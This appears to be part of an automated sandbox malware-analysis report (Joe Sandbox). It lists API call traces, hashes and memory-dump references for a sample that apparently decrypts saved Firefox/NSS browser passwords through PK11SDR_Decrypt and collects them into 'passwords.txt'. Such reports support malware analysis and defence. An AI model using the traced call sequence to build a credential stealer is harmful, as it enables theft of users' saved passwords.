                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DD7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DD92
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DD99
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DDAF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DDC1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DDC8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0092DDE6
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DDED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0092DDF4
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DDFB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DE10
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DE17
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DE27
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DE39
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DE40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0092DE68
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DE6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0092DE76
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DE7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DE98
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DE9F
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DEB2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DEC4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DECB
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092DED4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0092DEEA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DEF1
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092DF09
                                                                                                                                                                                                                • Part of subcall function 0092F0FD: std::_Xinvalid_argument.LIBCPMT ref: 0092F113
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DF4A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0092DF70
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DF7D
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092DF82
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0092DF91
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DF98
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DFAC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DFB3
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DFC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DFCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DFD5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092E00A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092E011
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0092E018
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092E01F
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092E03A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092E04C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092E053
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092E0F7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092E0FE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092E148
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092E14F
                                                                                                                                                                                                                • Part of subcall function 0092DB54: strchr.MSVCRT ref: 0092DBC7
                                                                                                                                                                                                                • Part of subcall function 0092DB54: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092DCCC), ref: 0092DBE9
                                                                                                                                                                                                                • Part of subcall function 0092DB54: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DBF6
                                                                                                                                                                                                                • Part of subcall function 0092DB54: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092DCCC), ref: 0092DBFD
                                                                                                                                                                                                                • Part of subcall function 0092DB54: strcpy_s.MSVCRT ref: 0092DC44
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 838878465-0
                                                                                                                                                                                                              • Opcode ID: a05368d7efb706c74c494a5f0a941addccec4e6688978375d514aed5a019e490
                                                                                                                                                                                                              • Instruction ID: 489781cc3ef3e4f13773f2124f1c7190cd853568656e902a728e2a384930c98a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a05368d7efb706c74c494a5f0a941addccec4e6688978375d514aed5a019e490
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E11A72C04228AFEF21AFF0EC89ADDBF78AF48301F25446AF615A7152DA359484DF54
                                                                                                                                                                                                              Function 6CB25DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CB25E08
                                                                                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB25E3F
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CB25E5C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25E7E
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25E97
                                                                                                                                                                                                              • PORT_Strdup_Util.NSS3(secmod.db), ref: 6CB25EA5
                                                                                                                                                                                                              • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CB25EBB
                                                                                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB25ECB
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CB25EF0
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25F12
                                                                                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB25F35
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CB25F5B
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25F82
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CB25FA3
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CB25FB7
                                                                                                                                                                                                              • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CB25FC4
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25FDB
                                                                                                                                                                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB25FE9
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25FFE
                                                                                                                                                                                                              • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CB2600C
                                                                                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB26027
                                                                                                                                                                                                              • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CB2605A
                                                                                                                                                                                                              • PR_smprintf.NSS3(6CBFAAF9,00000000), ref: 6CB2606A
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB2607C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB2609A
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB260B2
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB260CE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                              • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                              • API String ID: 1427204090-154007103
                                                                                                                                                                                                              • Opcode ID: 792643c6c484949697e451695f0fd40d1a0174c295db1ff237438ffc8fb3a09c
                                                                                                                                                                                                              • Instruction ID: 98a2f16a6223ad4baa0a57121fd95cdf9190107eb8fad48bd57a45890a7ae5df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 792643c6c484949697e451695f0fd40d1a0174c295db1ff237438ffc8fb3a09c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C91F6F4D042C15BEF119F659C81BBB3BA8EF05248F080060EC1D9BB46E729D949C7A3
                                                                                                                                                                                                              Function 0092A8EB Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 211stringmemoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A8F7
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,0095739C,0095680B), ref: 0092A996
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9AE
                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9B6
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9C2
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9CC
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9DE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9EA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A9F1
                                                                                                                                                                                                              • StrStrA.SHLWAPI(0092B7F9,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA02
                                                                                                                                                                                                              • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA1C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA2F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA39
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573A0,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA45
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA4F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573A4,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA5B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA68
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA70
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573A8,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA7C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA8C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AA9C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AAAF
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: _memset.LIBCMT ref: 0092A7EA
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A805
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0092A80D
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A81B
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A82F
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A86F
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: _memmove.LIBCMT ref: 0092A890
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A8C1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AABE
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573AC,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AACA
                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AADA
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AAEA
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AAFD
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: lstrcatA.KERNEL32(00956801,00956803,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A8BA
                                                                                                                                                                                                                • Part of subcall function 0092A7AD: lstrcatA.KERNEL32(00956801,0095680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A8D0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB0C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573B0,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB18
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,009573B4,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB24
                                                                                                                                                                                                              • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB34
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092AB52
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0092AB81
                                                                                                                                                                                                              • NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092AB87
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
                                                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                                                              • API String ID: 2725232238-347816968
                                                                                                                                                                                                              • Opcode ID: 7cc5627bb0f6b5dfdb4e3458b69dd7bf17ccee227b284d8b88c844a1be1194c1
                                                                                                                                                                                                              • Instruction ID: 27c0a7cad98d0271c9ff384348ef495e125611f53b5a4b8410b92a77be2cfb23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cc5627bb0f6b5dfdb4e3458b69dd7bf17ccee227b284d8b88c844a1be1194c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59717E32500215AFCB02AFA4FD4AE9E7BB9EF8D305F014150FA19B3161DF749985CBA6
                                                                                                                                                                                                              Function 6CAB1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_NewLock.NSS3 ref: 6CAB1DA3
                                                                                                                                                                                                                • Part of subcall function 6CB898D0: calloc.MOZGLUE(00000001,00000084,6CAB0936,00000001,?,6CAB102C), ref: 6CB898E5
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CAB1DB2
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: TlsGetValue.KERNEL32(00000040,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1267
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: EnterCriticalSection.KERNEL32(?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB127C
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB1291
                                                                                                                                                                                                                • Part of subcall function 6CAB1240: PR_Unlock.NSS3(?,?,?,?,6CAB116C,NSPR_LOG_MODULES), ref: 6CAB12A0
                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAB1DD8
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CAB1E4F
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CAB1EA4
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CAB1ECD
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CAB1EEF
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CAB1F17
                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAB1F34
                                                                                                                                                                                                              • PR_SetLogBuffering.NSS3(00004000), ref: 6CAB1F61
                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CAB1F6E
                                                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CAB1F83
                                                                                                                                                                                                              • PR_SetLogFile.NSS3(00000000), ref: 6CAB1FA2
                                                                                                                                                                                                              • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CAB1FB8
                                                                                                                                                                                                              • OutputDebugStringA.KERNEL32(00000000), ref: 6CAB1FCB
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAB1FD2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                              • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                              • API String ID: 2013311973-4000297177
                                                                                                                                                                                                              • Opcode ID: 23f41851d7c8020f1433516c183d8249c7d42ae571b4206aec540bb5905f9ac8
                                                                                                                                                                                                              • Instruction ID: 7a09281d499a8836172adc869ed642d14ae95bad46e107ddcc3d46cebd92316d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f41851d7c8020f1433516c183d8249c7d42ae571b4206aec540bb5905f9ac8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20518FB1E002499BDF00DBF5DD49BAE77B8AF01308F180529EA16EBA00E775D598CB91
                                                                                                                                                                                                              Function 00944CA7 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00944CAF
                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 00944CBB
                                                                                                                                                                                                                • Part of subcall function 0094497A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0094498B
                                                                                                                                                                                                                • Part of subcall function 0094497A: TlsFree.KERNEL32(FFFFFFFF), ref: 009449A5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00944CD1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00944CDE
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00944CEB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00944CF8
                                                                                                                                                                                                              • TlsAlloc.KERNEL32 ref: 00944D48
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 00944D63
                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 00944D6D
                                                                                                                                                                                                              • EncodePointer.KERNEL32 ref: 00944D7E
                                                                                                                                                                                                              • EncodePointer.KERNEL32 ref: 00944D8B
                                                                                                                                                                                                              • EncodePointer.KERNEL32 ref: 00944D98
                                                                                                                                                                                                              • EncodePointer.KERNEL32 ref: 00944DA5
                                                                                                                                                                                                              • DecodePointer.KERNEL32(Function_00024AFE), ref: 00944DC6
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00944DDB
                                                                                                                                                                                                              • DecodePointer.KERNEL32(00000000), ref: 00944DF5
                                                                                                                                                                                                              • __initptd.LIBCMT ref: 00944E00
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00944E07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
